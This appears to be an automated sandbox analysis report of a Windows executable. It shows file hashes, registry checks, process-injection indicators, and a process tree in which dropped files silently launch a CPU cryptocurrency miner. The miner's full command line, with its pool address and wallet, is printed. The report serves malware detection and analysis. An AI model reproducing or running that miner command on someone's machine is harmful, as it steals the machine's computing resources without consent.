73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
310s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14/02/2024, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5792	b2e.exe
5440	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5440	cpuminer-sse2.exe
5440	cpuminer-sse2.exe
5440	cpuminer-sse2.exe
5440	cpuminer-sse2.exe
5440	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/708-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 708 wrote to memory of 5792	708	batexe.exe	85
PID 708 wrote to memory of 5792	708	batexe.exe	85
PID 708 wrote to memory of 5792	708	batexe.exe	85
PID 5792 wrote to memory of 4968	5792	b2e.exe	86
PID 5792 wrote to memory of 4968	5792	b2e.exe	86
PID 5792 wrote to memory of 4968	5792	b2e.exe	86
PID 4968 wrote to memory of 5440	4968	cmd.exe	89
PID 4968 wrote to memory of 5440	4968	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:708
- C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\659B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe

Filesize
1.5MB

MD5
a19d6f7f245b4dd35efe5302da0cce5c

SHA1
d9a0afc6500b7e66c4f1a67681581237a0b2d2e4

SHA256
8aebcb2ed8be78759fa6c53af488856e9dad7e4382ec6519bfc04a2568f0cda3

SHA512
d15326c898d326b4b6f93c2518c3241eecaed5b17f0c6ff54e5c47e9e5da374e2d871adf56bdafa08f7080001427bbdf9305b5cfa37745e9bb09d4d68de196a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe

Filesize
921KB

MD5
396e6b604ba9a39dec5d52332cdd9be6

SHA1
22a39950586c92ea645cab82d1cd1c862a892df8

SHA256
519731301f34042fb42893a460477f12a016a72265b545893868413112aece1b

SHA512
e5ffbfcf92b79928ea1ab45d4881881f05a4dcbdcb4845b7f23d47880fd3dadbe5a31848947a226f1fb0e0c6374cc433e9a8833a03daf24ba095f386865e2495

Download Submit
C:\Users\Admin\AppData\Local\Temp\4E4A.tmp\b2e.exe

Filesize
1.2MB

MD5
8490408669c591296bf82f685682659b

SHA1
2f709d2e8abe669dde4b32891992aca303b77089

SHA256
e42ce342ec9b328095cfd9f06b33e868e4ace2f989c45439d52ad71ad34e91b7

SHA512
194ea993aff9d2dc77641bf62d4344fc65cd2412737edbb90ea32ccf5b34cedf51bd06403a1c202c0b6092c9f6176fa4baba073da5c17bd57bb0fddc486f0c7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\659B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
538KB

MD5
420911cfe377fdf840fe589386c60f3f

SHA1
bf36325ce75a7de7a6bf25352736dd1564f423df

SHA256
e5ce5c0209d6f9ba6a7b5f6fc849a859908d43fd9f75ead08ec47b5ae39dcbb3

SHA512
ba01b8417847c70b970707b0458d8aaaf59eb7cb8217e7682f7462de5141fd8a0d977ae4583f010753e9de56b359737460ad515249925fdfd4e3773d7e11e12b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
560KB

MD5
bdb2335400581dde5e8f645e121fe1c4

SHA1
13bd08d9bf8a56487f848de28f0621a4efaf0b2d

SHA256
7b66a3fe63f543136e04c934d03c74d14fc5002ad9446d858c47d30e9cf3a00a

SHA512
88036796062536196b29634d6ab346ef9e8a3bd020bf2e9b1d01b80637bc283ea9555bdd1be4f657d5a1475c38d5f5955272ff51698f346c6c8a5884788ed566

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
480KB

MD5
113e569bab8f59cf2574921f6e41a21f

SHA1
92133e89ab32e7dbe99f1dd3e9a75804ff5db932

SHA256
9d2fdc1ffc6c1580565d22d2d9190409eb2a41d85ae8172595c5600a88febbfb

SHA512
21957f08c06fdacf0f31d874a983a1e1102319364e5c644f0909d0fcf4856c9ba7ace948da0a17a4725391b83031fd11bef39d56fb691cb269861db9584b0212

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
368KB

MD5
15c03ef82fdb3f08730ca3710797f392

SHA1
e3b1ec88d6a239ede629f8768eeffb128d756746

SHA256
883423e993198c42da83cf7d4761c7fa92795baf59abf2ecc330da0c2207c014

SHA512
0265137f41609af4904f9e5ee49ca0133dff05087fd863b2970decc4e7ccae347caee93a217e42ce1dfeae5dc11d3e81fa3fe9cde40b3f0f6d1cd8da2473f9b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
708KB

MD5
7b591490e94b0f2ad2d28d46139d3a4f

SHA1
29e78b7d32892816cf7e84d5c1fdea093767b637

SHA256
7e3e2fa61eae711ca8505c3c2385755648be889531f455420d39bd92d7dd529c

SHA512
8497a2c85d6e99c87d7edbf369bf4c7ed4ceadc0aa6c1f869769c23bd58c7ce8f221c8e38cd48bd8192ef043557874a426f317e5f1facbb72f74312dd38d7aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
305KB

MD5
1209ec745b28622eeee8897b8d27806a

SHA1
3e8db5cbf2ffc1c7a83e6cfbd1c47e602b2bcd13

SHA256
7a6f70c404e0071672aa321b322608b04d8a56bddcbdadedaf0e3178653e72b6

SHA512
ba59440788d1f4b9fa8699eaca888ac61481daf4a1da3a5ffeae9d2d65607927d958d5533926cc3a778857b140697613a554145f4546de354b256c3cc1dfe135

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
383KB

MD5
1d34cddbf72e7117ffcd4388c34c11ba

SHA1
25301bc80fb247dfaeef90eb42252f0b2d98c5f3

SHA256
7522a0da839e4cd64833792bc6fcaec85645c2a4924fe364c9ede4e5b96ce863

SHA512
3bbd40a3fcba8c811adcd3e8199225423fa2bb8d7038be4e43df8c751932c477fdbb9f34f301b2c004283d62fd53ca922acf8f8f442866e5e04deb326b44d4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
444KB

MD5
8210cb7d748cfdf38ffd82b4e10a248c

SHA1
cceac6108f2bee2660a6bd7436e080f8f8de7f28

SHA256
2298ac5b804f85531d8452ee0880f0f309a27981478f832fed31087a0e9f9c75

SHA512
d26882d372dbae16d33c32468ba6c3830eacb42a1ec88905a47fde96b8a6414322cbf15bbdecd7ee7ed0920c60b3a64659a74bfc99b2bc5e4b44210a551353bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
540KB

MD5
d2a880d291d68ca7a4f93faa06214702

SHA1
95e0f998acd4358545b643e292cd0caeea4c1cdc

SHA256
bf944f8165a74fe978ce493cda2b9ebbdf50f1e9d02fb7869b3b0055c6e7354c

SHA512
62d90b81d82cf399da870b25a0503dbaee01a51c9284ff51a11cba14983029895974fa53be69feac548f187c57a0a7ac687bf7cb8f81de9cc1a380e73eb43293

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
394KB

MD5
cbb3542af06717731e53dc376f820085

SHA1
fdccb36306d04b2b5d6f70519de8eb2c981cd182

SHA256
00a4c5719a3dfe7624cad84c1dd720abdda9c93f69c695e294bc1e93f11efa86

SHA512
29b0ebe50a85b1a58b64090b9dbbb73f0f226b92106ef18e4074a365f6b0a3eeb56ea7897c636d1904696970e5f67e65bbe517dfe12e57e3b463d5444253a4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
405KB

MD5
2ec076588c61e16289c1b0c461cdb918

SHA1
a77aef97dfef710c4aec8581a1aa1b5f4a0e63d1

SHA256
03dcf26fdf3070527eb71a3d205a7a15cbc5327033ec4c74bf5ffa82a69fc8dc

SHA512
c3bf96db95c5761653eb0f112e56b84384e51fda866cb0da8e63bcd41821804a9ed9b8849c041071c908b59779535105312ab64c305126afc810ebd1a86e4798

Download Submit
memory/708-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5440-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5440-46-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5440-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5440-48-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5440-49-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-44-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5440-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5792-28-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download